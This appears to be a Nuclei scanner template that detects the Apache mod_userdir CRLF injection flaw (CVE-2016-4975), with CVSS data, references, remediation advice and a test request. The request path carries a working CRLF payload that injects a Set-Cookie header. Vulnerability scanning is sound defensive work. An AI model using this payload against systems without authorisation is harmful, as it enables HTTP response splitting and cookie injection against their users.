id: CVE-2016-4975 info: name: Apache mod_userdir CRLF injection author: melbadry9,nadino,xElkomy severity: medium description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. reference: - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 - https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3Ccvs.httpd.apache.org%3E - https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3Ccvs.httpd.apache.org%3E - https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-4975 cwe-id: CWE-93 epss-score: 0.00428 epss-percentile: 0.71512 cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: http_server tags: cve,cve2016,crlf,apache http: - method: GET path: - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" matchers: - type: regex part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' # digest: 4a0a00473045022100a74d00557181b9bf032a9cd7fcd3a1d1971ad10973541f660b8e2df1427d0cab02205620dc3008cace01fed59b97d3893275c1fa5314316a4a189452426e680b78cd:922c64590222798bb761d5b6d8e72950